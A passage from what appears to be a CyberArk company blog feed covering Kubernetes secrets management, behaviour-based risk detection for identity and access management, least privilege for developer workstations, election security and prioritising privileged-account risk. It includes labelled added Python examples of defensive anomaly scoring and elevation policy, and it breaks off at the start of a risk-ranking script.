CyberArk is proud to be a founding member, and the only Privileged Access Management (PAM) vendor in the Alliance. We view eliminating silos as a way of not only increasing the usability of each respective security solution in an organization’s stack, but also helping organizations to share information with each other about best practices. We’d like to see this trend continue into the ‘20s.

  2. Using AI More Effectively

Over the course of the past decade, Artificial Intelligence (AI) has evolved from being relied upon for decision support (forensic analysis, malware analysis, security team productivity) and intelligent automation (faster threat mitigation, orchestration, RPA, incident response) to cognitive processes (threat intelligence, attack pattern analysis, security policy optimization).

However, as I heard a MasterCard security practitioner neatly summarize during a session about AI, “If you automate a broken process, you’re just doing dumb stuff faster.” This highlighted, for me, a key feature of AI systems. AI can provide insights and increase efficiency, but it can’t fix the underlying problems in your system.

AI is only as good as the processes it automates and the people who manage it. What we’ve learned from this past decade is that AI must be paired with smart policies, human engagement and other tools, like Robotic Process Automation (RPA), to reach its potential.

  3. Threat Intelligence and Response

The importance of being able to identify and respond quickly to threats is a lesson we’ve learned the hard way over the past decade. We’ve faced new and increasingly targeted threats – from a ransomware infection that can bring a whole city to a halt to nation state attacks taking over telecommunications. That, coupled with the fact that environments are increasingly ephemeral and dynamic inherently makes life harder than ever on the Security Operations Center (SOC).

Fortunately, advances in security analytics have been able to dramatically operationalize and improve threat intelligence and response, key components of the SOC. Additionally, by having various data shared from tools, people and processes across the network, intelligently identifying threats is more possible now than ever before. Consequently, the SOC has gotten smarter and smarter about detecting and mitigating threats and likely will continue to be able to better automate intelligence and respond to threats to minimize damage.

For more information about CyberArk and to learn what you can do to secure your organization’s most critical systems, please check out the ways in which we help organizations secure privileged access.


New Open Source Offerings Simplify Securing Kubernetes https://www.cyberark.com/blog/new-open-source-offerings-simplify-securing-kubernetes/ Tue, 12 Nov 2019 21:21:23 +0000 https://www.cyberark.com/?p=79128 Kubernetes Open Source

In advance of the upcoming KubeCon 2019 (CyberArk booth S55), the flagship event for all things Kubernetes and Cloud Native Computing Foundation, CyberArk is adding several new Kubernetes offerings to its open source portfolio to improve the security of application containers within Kubernetes clusters running enterprise workloads.

Secrets Can Be Pushed to Native Kubernetes Secrets Store

CyberArk’s out-of-the-box integration with Kubernetes Secrets strengthens the security of the native Kubernetes secrets mechanism by enabling CyberArk to centrally manage secrets without requiring any changes to code or further involvement of developers. The integration is available for Conjur Open Source and CyberArk Application Access Manager.

A challenge with the native secret stores of various tools and platforms used in development and production environments is that not only are credential management, rotation, audit and other similar processes limited and inconsistent, the ability to securely share secrets across tools is also limited.

Too often this results in islands of security with poorly and inconsistently secured secrets, sometimes with the same secret stored in multiple tools. The CyberArk integration with Kubernetes enables organizations to use CyberArk to centrally manage Kubernetes secrets alongside secrets used by other leading tools and platforms, including Jenkins, Ansible, OpenShift and more.

For organizations using Conjur Open Source to manage application secrets and other credentials, secrets are pushed to the native Kubernetes secrets store based on Conjur policies. Conjur’s management of Kubernetes is completely transparent to developers since no changes are required. The application code simply accesses the secrets in the Kubernetes secrets store exactly as it did before.

Similarly, for CyberArk enterprise customers, secrets are also pushed to the native Kubernetes secrets store – this time using Application Access Manager and based on policy. Additionally, organizations can consistently and centrally manage secrets and credentials used by both non-human identities as well as human users, including securing interactive access to Kubernetes and other tool management consoles.

For additional information read up on CyberArk Secrets Provider for Kubernetes Secrets.

SDK Simplifies Development of Secure Kubernetes Applications

Secretless Broker, launched earlier this year, simplifies how containerized applications running in Kubernetes securely access databases, HTTPS based web applications and servers. The new SDK enables developers to write new service connectors to extend the range of databases and other external resources accessed by applications using CyberArk’s Secretless Broker capability.

With Secretless Broker, when an application needs to securely access a resource, the app simply makes a local connection request to Secretless Broker. Secretless Broker then automatically authenticates the app, fetches the required credentials from the CyberArk vault and establishes a connection to the database or other resource. With Secretless Broker, the application no longer has access to credentials, preventing them from being accidentally leaked or exposed by the application and reducing the attack surface.

This approach offers two major simplifications for developers. First, it eliminates the need for the developer to write API calls to fetch the access credential or secret from Kubernetes secrets (or any other secrets store), and second it removes the need for the application to directly handle secrets.

Secretless Broker provides development teams deploying applications in Red Hat OpenShift and Kubernetes environments with a simplified option for applications to securely access MySQL and PostgreSQL databases. The SDK enables developers to add support for additional databases and resources.

Secretless Broker is an open source project that is integrated with Conjur Open Source and offered as a fully supported feature of the Application Access Manager Dynamic Access Provider. The open source version is available from Conjur.

For additional information join the discussion on SDK.

Improved Capabilities for Native Vaults

The integration with the Kubernetes native secrets capability, together with the previously announced integration with Ansible Tower, is part of CyberArk’s push to give developers transparent access to powerful capabilities that improve the security and ease of use of native secret stores in leading developer tools and platforms. These capabilities include policy-based secrets rotation and centralized secrets management, which lifts the burden of securing and managing secrets scattered across multiple tools and platforms from the shoulders of developers.

Additionally, enterprise versions of these integrations add improved secrets management capabilities, including enterprise class policy-based rotation, audit and other management capabilities as well as enterprise class scalability and availability.

Join the Conversation on the CyberArk Commons

If you’re interested in Kubernetes and open source, you can also join the conversation on the CyberArk Commons Community. Secretless Broker, Conjur and other open source projects are a part of the CyberArk Commons Community, an open community dedicated to developers, engineers, cybersecurity researchers and other technically minded people. To discuss Kubernetes, Secretless Broker, Conjur or CyberArk Threat Research, join me on the CyberArk Commons discussion forum.


Simple Rules for Smart IAM Solutions. – Part 3: Making Sense of Data, Risk Detection and Intelligently Leveraging It https://www.cyberark.com/blog/simple-rules-for-smart-iam-solutions-part-3-making-sense-of-data-risk-detection-and-intelligently-leveraging-it/ Tue, 12 Nov 2019 18:51:22 +0000 https://www.cyberark.com/?p=99461

In part 3 of this series on Simple Rules for Smart IAM Solutions, we will examine the most efficient ways in which we can slice and dice the data collected from the various contexts which will then be used to compute risk of the various users.

In my last blog we covered the various contexts that should feed into a user behavior analytics (UBA) system to efficiently identify patterns, based on which the identity and access management (IAM) solution can then determine appropriate access policies for a given identity and resource combination. Today we are going to look at the most efficient ways to slice and dice the data collected from those contexts, which is then used to compute the risk of the various users. In other words, we need to ask ourselves what the minimal set of dimensions (a.k.a. features or attributes) is that we can reduce our dataset to while still extracting behavioral patterns reliably. In data science parlance this is referred to as “dimensionality reduction”, done in order to overcome the “curse of dimensionality”. So, let’s dive in.

How do I address the curse of dimensionality?

Picking up from where we left last time, notice that I have added another box for this step of dimensionality reduction:

Simple Steps3 Image 1

Naturally, the question arising is why would we even want to go through with this? Isn’t having more dimensions going to give me more reliable behavioral patterns? These are perfectly valid questions, and the simple answer is that you actually don’t need all the features to cover the entire behavioral variance. Yes, “variance” is the key factor, and the goal is always to cover as much variance as possible with as few features as possible.

To explain what I mean by variance, let’s consider an example workforce. Say the workforce is limited to one geographical location, with most employees working Monday through Friday, between 8am and 6pm, on enterprise-provided devices (both mobile phones and workstations), with limited required travel. The variance (deviation from average, or standard, behavior) of a typical employee in this organization would be much smaller than in a workforce that travels a lot, is spread across multiple geographical locations and has a more casual device policy. Establishing behavioral patterns for the first workforce would be possible with far fewer features than for the latter.

There are various methods available for this, and one of the most popular is Principal Component Analysis (PCA). As the name suggests, it determines the “principal” components required to discover patterns in a dataset. You can find more information on this here. The graph below illustrates how much variance is covered (Y-axis) by how many principal components (X-axis) for an example dataset.

Simple Steps3 Image2

Detecting Risk

After identifying the principal components, the main goal is to establish baselines for the users’ normal behaviors and then use one of the many methods and algorithms available to detect deviations from normal behavior. This is called anomaly detection and you can go through some of the popular methods in ML to apply anomaly detection to datasets here.

A good model should have the ability to adapt to changes in the characteristics of the data being ingested and be able to adjust the severity of the risk in a dynamic fashion. This means there should be some concept of the degree of anomaly and of the confidence with which the model is able to detect risk of various levels.
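To make the two steps above concrete (reducing the feature set to the components that carry the variance, then scoring deviations from the baseline), here is an added example in plain Python. It is not code from the original post or from any CyberArk product. It standardizes a constructed set of one user’s login events across four assumed features (hour of day, day of week, known device, distance from the office), finds the principal components with power iteration and deflation, reads off how many components cover 95% of the variance, and then scores new events by their squared Mahalanobis distance in that reduced space, with a severity band derived from the worst score seen in the baseline. The events, the features and the severity thresholds are all constructed.

```python
"""PCA (via power iteration) and anomaly scoring over constructed login events.
Added example, not code from the original post or from CyberArk; pure Python."""
import math

# Assumed features of one login event; the baseline events are constructed:
# office hours, weekdays, mostly the enrolled device, always near the office.
FEATURES = ["hour_of_day", "day_of_week", "known_device", "distance_km"]
BASELINE = [
    [8, 0, 1, 0.5], [9, 1, 1, 1.0], [10, 2, 1, 0.0], [9, 3, 1, 2.0],
    [17, 4, 1, 0.5], [8, 0, 0, 3.0], [13, 1, 1, 0.0], [18, 2, 1, 1.5],
    [9, 3, 0, 4.0], [16, 4, 1, 0.0], [11, 0, 1, 1.0], [14, 2, 1, 0.5],
]


def _dot(a, b):
    return sum(x * y for x, y in zip(a, b))


def standardize(rows):
    """Center each feature and scale it to unit sample variance, so that
    distance in km cannot dominate the components just because of its units."""
    n, d = len(rows), len(rows[0])
    means = [sum(r[j] for r in rows) / n for j in range(d)]
    stds = [math.sqrt(sum((r[j] - means[j]) ** 2 for r in rows) / (n - 1))
            for j in range(d)]
    z = [[(r[j] - means[j]) / stds[j] for j in range(d)] for r in rows]
    return means, stds, z


def covariance(z):
    n, d = len(z), len(z[0])
    return [[sum(r[i] * r[j] for r in z) / (n - 1) for j in range(d)]
            for i in range(d)]


def power_iteration(m, iters=20000, tol=1e-13):
    """Dominant (eigenvalue, unit eigenvector) of a symmetric matrix."""
    d = len(m)
    v = [1.0 + 0.1 * i for i in range(d)]              # generic start vector
    v = [x / math.sqrt(_dot(v, v)) for x in v]
    lam = 0.0
    for _ in range(iters):
        w = [_dot(row, v) for row in m]
        lam = _dot(v, w)                                 # Rayleigh quotient
        norm = math.sqrt(_dot(w, w))
        if norm < 1e-15:                                 # nothing left to find
            return 0.0, v
        w = [x / norm for x in w]
        delta = math.sqrt(sum((a - b) ** 2 for a, b in zip(w, v)))
        v = w
        if delta < tol:
            break
    return lam, v


def principal_components(z):
    """All (variance, direction) pairs, largest variance first: after each
    component is found it is deflated out (C <- C - lam * v v^T)."""
    c = covariance(z)
    d = len(c)
    comps = []
    for _ in range(d):
        lam, v = power_iteration(c)
        comps.append((lam, v))
        c = [[c[i][j] - lam * v[i] * v[j] for j in range(d)] for i in range(d)]
    return comps


def explained_variance_ratio(comps):
    total = sum(lam for lam, _ in comps)
    return [lam / total for lam, _ in comps]


def components_for_variance(ratios, target=0.95):
    """Smallest k whose cumulative ratio reaches target: the number of PCs one
    reads off a variance-vs-components curve."""
    cumulative = 0.0
    for k, r in enumerate(ratios, start=1):
        cumulative += r
        if cumulative >= target:
            return k
    return len(ratios)


class BehaviorModel:
    """Baseline of normal behavior in the reduced space, plus a risk score."""

    def __init__(self, rows, target_variance=0.95):
        self.means, self.stds, z = standardize(rows)
        comps = principal_components(z)
        self.k = components_for_variance(explained_variance_ratio(comps), target_variance)
        self.kept = [(lam, v) for lam, v in comps[:self.k] if lam > 1e-12]
        self.baseline_max = max(self._score(r) for r in z)

    def _score(self, zrow):
        # Squared Mahalanobis distance restricted to the kept components: each
        # projection is divided by that component's variance, so a deviation
        # along a direction the baseline rarely moves in counts for more.
        return sum(_dot(zrow, v) ** 2 / lam for lam, v in self.kept)

    def anomaly_score(self, event):
        return self._score([(x - m) / s for x, m, s in zip(event, self.means, self.stds)])

    def severity(self, event):
        """Degree of anomaly relative to the worst score seen in the baseline."""
        s = self.anomaly_score(event)
        if s <= self.baseline_max:
            return "normal"
        return "medium" if s <= 3 * self.baseline_max else "high"


if __name__ == "__main__":
    model = BehaviorModel(BASELINE)
    print("components kept:", model.k, "of", len(FEATURES))
    # Constructed events: a routine login, then 3am from an unknown device far away.
    for event in ([10, 1, 1, 1.0], [3, 6, 0, 4000.0]):
        print(event, round(model.anomaly_score(event), 2), model.severity(event))
```

The score divides each projection by its component’s variance, so a small step along a direction that rarely varies in the baseline counts for more than a large step along one that always does; that is the “degree of anomaly” the post asks for. Confidence is not modelled here, and with a baseline of twelve events the severity bands would be far too sensitive for production use, which is exactly why such a model has to be re-fit as the ingested data drifts.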

Automating Responses & Adapting to Risk

So, by now we have collected and cleaned the data, identified the key features and decided on the model to apply in order to detect risks. Now with every new data point, the solution is able to flag it as normal or attribute a risk flag to it with the right severity level. A good solution is able to take this and automate some of the following workflows and actions such that human/manual intervention is reduced to a minimum. Let’s look at some of these actions in the context of Identity and Access Management.

At a minimum the solution must be able to:

  1. Log the incident
  2. Notify relevant stakeholders through email/IM
  3. Step up access security for critical resources
  4. Define access policies for the various risk levels
  5. Provide a visual interface to visualize the threat
  6. Provide sufficient audit trail to the admin in order to investigate the incident

Advanced solutions are able to integrate responses with the following workflows and address a variety of risk-based access control decisions and actions:

  1. Integrate risk with access workflow management and other Identity Governance processes
  2. Generate dynamic policies based on the risk level and all impacted resources
  3. Provide internal and external workflows that can be invoked automatically once properly configured
  4. Provide sufficient knobs for admins to fine-tune the model in order to reduce false positives
  5. Continuously monitor user behavior and adjust the associated access policies appropriately

What’s Next?

In the final part of this blog series we’ll dig into the automation and orchestration use cases and how they are absolutely critical in delivering on the promise of Zero Trust without compromising on the end-user experience. We’ll explore a couple of use cases to emphasize the importance of connecting seemingly disparate systems and workflows (both internal and external) in order to deliver this.

Part 1 in this series

Part 2 in this series

Secure Developer Workstations Without Slowing Them Down https://www.cyberark.com/blog/secure-developer-workstations-without-slowing-them-down/ Thu, 07 Nov 2019 20:21:20 +0000 https://www.cyberark.com/?p=77263

Fueled by automation, the adoption of DevOps processes and more, the role of the developer has become increasingly important and widespread for enterprises going through digital transformation. Developers need access to privileged credentials in order to use key developer tools like the Kubernetes or Jenkins admin console. These credentials can be saved locally, making developers’ workstations — whether they are Macs or PCs — high-value targets for attackers.

These workstations are often vulnerable to something as simple as a phishing email, which attackers can use as an entry point to the developer’s credentials. Because of these vulnerabilities, securing developers’ workstations is extremely important. However, developers are famous for prizing speed above all else — and for seeing security as little more than a speed bump. So how do you ensure that developers take security seriously?

Securing privileged access through the principle of least privilege needs to be a top security priority. It is no secret that no one should have full-time admin rights. But what does that mean for developers?

Security teams face a difficult dilemma. They need to better secure developer workstations while still providing them the elevated permissions and privileges—and freedom—they need to get their job done. And they need to do all that without impacting velocity.

I recently encountered this comment on the Stackoverflow forum:

 “There is almost no legitimate operational reason for restricting admin access to local PCs for staff that need it to do their job.”

Is that true?

Developers, DevOps and other engineers all perform administrative tasks as part of their job responsibilities, so they also have “full control” of their environment. Furthermore, because of the work developers do, there are extra challenges involved in hardening and restraining their workstations regardless of whether they are using Windows or macOS.

Developers install and uninstall software, drivers and system updates. They change operating system internals and use debugging programs on a regular basis. Without full control, developers often can’t do their jobs.

However, developers have access to source code, API keys and other shared secrets – usually more access than the standard user. Compromising a developer is a quick way for attackers to gain immediate elevated access to the most essential, mission-critical information an organization has. Consequently, developers have the kind of access that attackers want, which makes them the type of user who needs the highest levels of protection – whether they like it or not.

Want to take over a company or cause reputational damage quickly? Compromise a developer endpoint.

There are even specific types of attacks designed to target developers. For instance, in “watering hole” attacks, cyber attackers compromise common, popular developer websites known to be good places to share code and get help troubleshooting programming issues. For example, four of the largest software developer companies in the world were compromised during a single cyber attack campaign that placed a zero-day Java exploit on an iOS developer website.

Rights and Responsibilities

One way to deal with developers’ requests for full admin rights would be to provide them with virtual machines dedicated to programming, which could be perfectly patched and thoroughly hardened. This is doable with the right amount of monitoring and alerting, antimalware and IPS.

However, a workaround like this has a huge management overhead. It requires more budget, additional machines and another user to manage those machines. It’s not a comfortable situation for the IT team or the developer – and let’s not forget the cost of such a solution.

Additionally, while using their development tools, developers consume a lot of computer resources (e.g. generating millions of temporary files during code compilation). This leaves the security team with the job of ensuring that no significant performance impact occurs while implementing endpoint security products – not an easy task.

Conventional attempts to counter this typically require system administrators or security staff to perform manual inspections and craft security policies in response. As application complexity and development velocity increase, it becomes impractical to determine least privilege ahead of time manually. Furthermore, a central policy gatekeeper won’t scale efficiently and is likely to negatively impact delivery velocity.

Cutting the Gordian Knot

There has to be a better way to balance the needs of the developer with security concerns. Organizations need to be able to remove administrative privileges from developers without preventing them from doing their jobs, reducing velocity or overburdening security teams.

CyberArk Endpoint Privilege Manager can overcome these obstacles, allowing organizations to remove privileged credential rights on Windows workstations, servers and macOS. It provides privileged access management (PAM), allowing enterprises to easily remove local Admin users – including developers. For instance, CyberArk Endpoint Privilege Manager can elevate specific applications used by the developer on a day-to-day basis or provide just-in-time user elevation for a specified time while recording and logging all user activity.

In addition, since developers may save credentials to their development environments, Endpoint Privilege Manager protects those repositories from credential theft while allowing trusted applications to use the credential stores.

Another key feature for the developer use case is the set of out-of-the-box predefined policies for different developer tools like Visual Studio, Eclipse, Git and others.
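To show the shape of the policy described in the last three paragraphs (approved applications elevate automatically, a user can hold a time-boxed just-in-time grant, everything else runs without admin rights, and every decision lands in an audit trail), here is an added example in Python. It is not Endpoint Privilege Manager code and says nothing about that product’s internals; the application bytes, paths, user name and timestamps are constructed. One point the model makes that a path-based allowlist would not: applications are matched by content hash, so a lookalike binary with an approved file name is still run unprivileged.

```python
"""Least-privilege elevation policy for a developer workstation, as a model.
Added example, not Endpoint Privilege Manager code; all inputs are constructed."""
import hashlib
from datetime import datetime, timedelta

# Constructed stand-ins for application binaries (the bytes a policy hashes).
APP_BINARIES = {
    "C:\\Program Files\\Git\\bin\\git.exe": b"constructed git binary",
    "C:\\Users\\dev\\Downloads\\git.exe": b"constructed lookalike, not git",
    "C:\\Tools\\debugger.exe": b"constructed debugger binary",
}


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Approved tools are identified by content hash, not by path or file name, so
# a renamed or dropped-in lookalike does not inherit the elevation rule.
APPROVED_HASHES = {
    sha256_of(APP_BINARIES["C:\\Program Files\\Git\\bin\\git.exe"]): "Git",
}


class ElevationPolicy:
    def __init__(self, approved=APPROVED_HASHES):
        self.approved = approved
        self.jit_grants = {}   # user -> expiry time of a just-in-time grant
        self.audit = []        # one record per grant and per launch decision

    def grant_jit(self, user, minutes, now):
        """Time-boxed elevation for whatever the user launches (e.g. a driver
        install); it lapses on its own instead of leaving admin rights behind."""
        expiry = now + timedelta(minutes=minutes)
        self.jit_grants[user] = expiry
        self.audit.append({"event": "jit_grant", "time": now.isoformat(),
                           "user": user, "expires": expiry.isoformat()})
        return expiry

    def has_jit(self, user, now):
        expiry = self.jit_grants.get(user)
        return expiry is not None and now < expiry

    def decide(self, user, path, data, now):
        """Return 'elevate' or 'run_unprivileged' for one launch, and log it."""
        digest = sha256_of(data)
        if digest in self.approved:
            decision, reason = "elevate", "approved app: " + self.approved[digest]
        elif self.has_jit(user, now):
            decision, reason = "elevate", "just-in-time grant"
        else:
            decision, reason = "run_unprivileged", "not in policy"
        self.audit.append({"event": "decision", "time": now.isoformat(),
                           "user": user, "path": path, "sha256": digest,
                           "decision": decision, "reason": reason})
        return decision


if __name__ == "__main__":
    policy = ElevationPolicy()
    t0 = datetime(2019, 11, 7, 9, 0)                    # constructed timestamp
    for path, data in APP_BINARIES.items():
        print(path, "->", policy.decide("dev", path, data, t0))
    policy.grant_jit("dev", 30, t0)
    dbg = APP_BINARIES["C:\\Tools\\debugger.exe"]
    print("debugger during grant ->",
          policy.decide("dev", "C:\\Tools\\debugger.exe", dbg, t0 + timedelta(minutes=10)))
    print("debugger after grant ->",
          policy.decide("dev", "C:\\Tools\\debugger.exe", dbg, t0 + timedelta(minutes=31)))
    for record in policy.audit:
        print(record)
```

The audit records carry the hash of what was actually launched, not just the path, which is what an investigator needs when the question later is whether the elevated binary was the one the policy intended.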

Secure developer workstations with least privilege

Final Thought – The Developer Resistance

Each new security-driven restriction impacts the developer productivity throughout the entire software development process. Consequently, developers may fight the rules and restrictions necessary to maintain a strong security posture. What makes Endpoint Privilege Manager any different?

Endpoint Privilege Manager minimizes interference in the developer workflow. Developers – and other users – don’t need to go through the extra step of involving an administrator when they need access to certain applications. For a predefined, approved set of applications, users can seamlessly gain access through an automated process.

Furthermore, Endpoint Privilege Manager allows users to elevate privileges to access these approved applications while continuing to access other, unapproved applications as non-privileged users. This means that developers can continue to access the majority of the applications they use on a daily basis without having to slow down – without losing out on the benefits of application security.

Developers are like builders constructing a house on an empty lot. They need to be armed with the best tools to do their best work. If you give them old equipment, they will spend more time working around it than actually building. Endpoint Privilege Manager lets developers do what they do best – without interrupting their workflow with compliance and security requirements – so that they can write code faster.

Developers don’t need to be the last holdout for administrator rights within an organization. Learn how this is possible today.

Why Worrying About Election Security Only During Election Season Is Part of The Problem https://www.cyberark.com/blog/why-worrying-about-election-security-only-during-election-season-is-part-of-the-problem/ Tue, 05 Nov 2019 18:55:43 +0000 https://www.cyberark.com/?p=99486

Year-round awareness and careful communication, coupled with common sense cybersecurity practices like multi-factor authentication and a Zero Trust perimeter, are the best defense against the fluid combination of varied attacks, evolving vulnerabilities, and human error that comes into play during elections.

“But what about her emails!”

It’s become an unfortunate joke now, but the 2016 presidential election was mired in a seemingly unrelenting string of scandals centered around personal online habits and cybersecurity. While opponents harped on about Hillary Clinton using her personal email for political use – and thus potentially endangering sensitive data – you also had the tangential but related story of John Podesta, former White House Chief of Staff and chair of Clinton’s campaign. He was compromised in a data breach and had thousands of emails – many relating directly to the campaign – stolen in what amounted to a run-of-the-mill phishing attack and simple human error that could have affected any number of non-political businesses or personal accounts.

But while a lot of the noise around these stories was bluster and political posturing, the specter of cybersecurity breaches shaping a presidential election was raised, perhaps permanently. Data can be placed in jeopardy in a myriad of ways, even without hackers actively looking for it. Is election security even possible given the sheer amount of vulnerabilities?

It Can’t Be Just an Election Season Concern

This is why a discussion about election security is really no different from any other conversation about the threats that face all individuals or businesses. It’s also why the notion of election security doesn’t – or shouldn’t – just bubble up when an election is near. It’s a year-round concern, one complicated by numerous vulnerabilities.

And that’s because hackers aren’t necessarily interested in changing votes. Although that very idea was floated as part of Special Counsel Robert Mueller’s investigation into the 2016 election, the results were inconclusive. As Philip Bump wrote in the Washington Post regarding the Mueller probe, “It may be — and appears to be — true that Russia didn’t manipulate actual voting results, changing a county’s pro-Clinton votes into pro-Trump ones…But Russia’s efforts absolutely affected the vote, as they were intended to…”

By “as they were intended to,” Bump is referring to how the registered voter data that hackers collect can be used to sway opinion and affect votes through hyper-targeted misinformation campaigns. By engaging in this scary new kind of digital gerrymandering, hackers can feed incorrect voting dates or false voting locations in an effort to prevent people from reaching the polls at all. In a 2018 Fast Company article titled “How Facebook Blew It,” Alex Pasternack and Joel Winston wrote, “The [Trump] campaign would use Facebook in uglier ways too. Days before the election, Bloomberg reported, the Trump team was rounding out a massive Facebook and Instagram ad purchase with a ‘major voter suppression’ effort. The effort, composed of short anti-Clinton video ads, targeted the ‘three groups Clinton needs to win overwhelmingly . . .  idealistic white liberals, young women, and African-Americans’ with ads meant to keep them from voting.”

And yet, adding or removing votes remains a common misconception when the subject of election security is broached. Election hackers are after personal data. There is always danger around centralizing too much data, and elections amplify this threat by offering a window during which massive amounts of personal data for large swathes of the country are gathered and recorded. In the 2016 election, according to a report in Bloomberg News, hackers hit at least 39 states, with breaches into software systems and voter databases. In Illinois, detectives found proof that intruders tried to delete or otherwise alter voter data. In at least one state, hackers accessed a campaign-finance database.

This is why “election security” is such a frustrating issue in a lot of ways. It’s nearly impossible to police at a high level, especially when you’re dealing with the existential threat posed by social platforms like Facebook. How do you prevent the formation of an opinion based on misinformation? The truth is, you can’t – but you also don’t stand a fighting chance of limiting the possibility if you only begin to act a few weeks before an election, or if you hope some “other” will fix the problem without any changes on everyone’s part.

Be Aware and Be Active

Election cybersecurity needs active participation from everyone. Waiting for someone else to Band-Aid the problem and guarantee a 100% secure election is folly. There are simply too many factors at play here. Year-round awareness and careful communication, coupled with common sense cybersecurity practices like multi-factor authentication and a Zero Trust perimeter, are the best defense against the fluid combination of varied attacks, evolving vulnerabilities, and human error that comes into play during elections. And when we refer to awareness and communication, we don’t mean between campaign managers and their IT personnel. We mean everyone. Get involved, because it’s the only way to ensure every county, precinct, and state is doing what they can. Each state manages its own elections, and we’re all only as strong as our weakest link.

So the call to action is simple: Contact your state and local representatives and ask them these three questions:

  • Do they have multi-factor authentication turned on for all email services, devices, and any system or application that manages voter registration or other constituent data?
  • Do they have proper access controls in place, and can they prove that only authorized individuals are allowed access to voter and other constituent data?
  • What proactive measures do they have in place to ensure that proper and vetted voting information (like polling dates and locations) is reaching their constituents?
How Do You Prioritize Risk for Privileged Access Management? https://www.cyberark.com/blog/how-do-you-prioritize-risk-for-privilege-access-management/ Tue, 05 Nov 2019 16:07:15 +0000 https://www.cyberark.com/?p=76767 Privilege Access Management (PAM) Risk Prioritization

For many organizations, implementing privileged access management (PAM) has become a high priority – and for good reason. Privileged access is the route to an organization’s most valuable information and assets, and protecting them is paramount.

However, many organizations lack visibility into where privileged accounts, credentials and secrets exist. The privilege-related attack surface is often much broader than anticipated. So before you get started with any PAM deployment, there’s one big question you need to answer: How Do You Prioritize Risk?

Here are a few steps that can help:

1. Identify all privileged accounts and credentials. Depending on how many IT assets (systems, databases, applications, SaaS, cloud providers and DevOps tools) you have, there may be tens, hundreds, thousands, or even hundreds of thousands of privileged credentials and secrets across your environment. How can you protect what you don’t even know you have?

The first step to prioritizing risk is to scan and identify all of the privileged accounts and credentials (passwords, SSH keys, password hashes, AWS access keys and more) in your environment—on-premises, in the cloud, at the endpoint and across DevOps processes—to understand the scope of potential exposure.

2. Classify types of privileged access by risk. During or after the inventory process, you need to determine a method to evaluate risk. Since you cannot fix everything at once, it’s best to take a risk-based approach, tackling the riskiest areas first and then expanding to new areas over time. Some examples of risk-based prioritization may include identifying:

  • Your organization’s most critical systems (using a risk classification system or risk-rating mechanism)
  • Systems that contain data that needs to be secured due to regulatory requirements
  • Systems with intellectual property or customer data
  • Known vulnerable systems (if issues have already been identified from audits, penetration tests or Red Team exercises)

Most organizations start by identifying a small set of accounts that are relatively easy to pinpoint and present high risk, and then conduct a sprint to implement critical privileged access controls in a short period of time (e.g., 30 days). Then, over time, the organization expands coverage in new phases, adding controls to more accounts.

3. Protect the riskiest accounts first to avoid network takeover attacks. In most cases, organizations focus initial efforts on securing tier0 and tier1 critical assets, such as domain administrator accounts and administrator accounts with access to large numbers of machines, particularly servers, as well as application accounts that use domain administrator privileges.

Cyber attacks that reach the domain controller level can lead to a hostile takeover of the network and its assets, and attackers are now applying the same approach to new environments, targeting cloud consoles and orchestration tools. Attackers who gain this level of privileged access can control any server, controller, endpoint or piece of data, anywhere on a network.

Regardless of environment, all privileged access to tier0 and tier1 assets should be isolated, all admin credentials should be placed and rotated in a digital vault protected with multi-factor authentication (MFA) and access should be continuously monitored. You should also ensure that there are no hash residuals by design and you are able to detect and block in-progress attacks on domain controllers.

4. Control and secure your infrastructure accounts. Next, many organizations turn their attention to securing and managing the powerful default infrastructure accounts that exist on-premises and in cloud and DevOps environments. Once attackers get their hands on these accounts, they can take ownership of the entire technology stack: compromising a single, unprotected infrastructure account that still has its default, unchanged password is enough. The same credentials can then be used to access similar assets.

Work toward managing 100 percent of these accounts using secure processes and a PAM solution that consistently and securely manages these accounts. All well-known infrastructure accounts should be vaulted and privileged sessions should be isolated and recorded to minimize risk.

5. Limit lateral movement by protecting privilege at the endpoint. Every single workstation in an organization contains privilege by default. Built-in admin accounts allow IT to fix issues locally, but create a massive security gap that attackers target and exploit. Attackers can exploit these risky systems by getting in and then jumping laterally from workstation to workstation until they reach what they are looking for.

It’s important to implement least privilege and just-in-time elevation and access and also remove local administrative rights from workstations. Without strong endpoint security, attackers can easily move laterally into—and around—the network.

6. Protect credentials for third-party applications. For systems to work together, they have to be able to access one another. That’s why the number of machines and applications that require privileged access vastly outnumbers people in most organizations today. These non-human entities are difficult to monitor, keep track of or even identify.

Plus, commercial off-the-shelf (COTS) apps typically require access to various parts of the network, which attackers can exploit. Remember—you are only as strong as your weakest link.

All privileged accounts used by third-party applications should be centrally stored, managed and rotated in a digital vault. Additionally, all hard-coded credentials should be removed from COTS applications to minimize risk.

7. Manage *NIX SSH Keys. SSH keys are pure gold to a hacker or malicious insider, as they can use unmanaged SSH keys to log in with root access and take over the *NIX (Linux and Unix systems) technology stack. Unix and Linux systems house some of an enterprise’s most sensitive assets and Linux is a commonly deployed operating system in cloud environments. Yet individual privileged accounts and credentials—including SSH keys—used to gain root privileges are often overlooked by security teams.

8. Manage DevOps Secrets in the Cloud and On-Premises. For organizations embracing DevOps technologies, it’s important to dedicate a phase to securing (and then continuously managing) the credentials and secrets used by DevOps tools (e.g., Ansible, Jenkins and Docker) and Platform as a Service (PaaS) solutions (e.g., OpenShift and Pivotal Cloud Foundry).

Make sure these credentials and secrets can be retrieved on the fly and are automatically rotated and managed. This essentially means that your code should be capable of retrieving the necessary privileged credentials from a PAM solution instead of having them hardcoded into an application. Policies for rotating secrets also greatly reduce the risk of secrets becoming compromised.

9. Secure SaaS Admins and Privileged Business Users. Too often, Software as a Service (SaaS) and privileged business users can be forgotten in prioritization efforts. Yet, cyber criminals will steal credentials used by SaaS administrators and privileged business users to get high-level and stealthy access to sensitive systems.

Examples of business critical SaaS applications can be anything from Customer Relationship Management (CRM) software to applications used by the finance, HR and marketing teams. Privileged business users with access to these types of applications can perform very sensitive actions, such as downloading and deleting sensitive data. To prevent this kind of attack, isolate all access to shared IDs and require MFA. Also, monitor and record the sessions of SaaS admins and privileged business users.
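As an added example (not CyberArk's code), the scoring below turns the criteria from these nine steps into a rubric that ranks a discovered inventory and slices it into sprints; the weights, tiers and sample records are constructed assumptions, not a published standard.

```python
"""Risk-ranking a privileged-account inventory (added illustration, not CyberArk's code).

Each rule maps to one of the nine steps: Tier 0/1 assets first, default
infrastructure passwords, unmanaged root SSH keys, hard-coded application
and DevOps secrets, local admin rights, unprotected admin and SaaS access.
Weights, tiers and the sample records are constructed for illustration.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

ROTATION_MAX_AGE = timedelta(days=90)   # assumed policy: rotate at least quarterly
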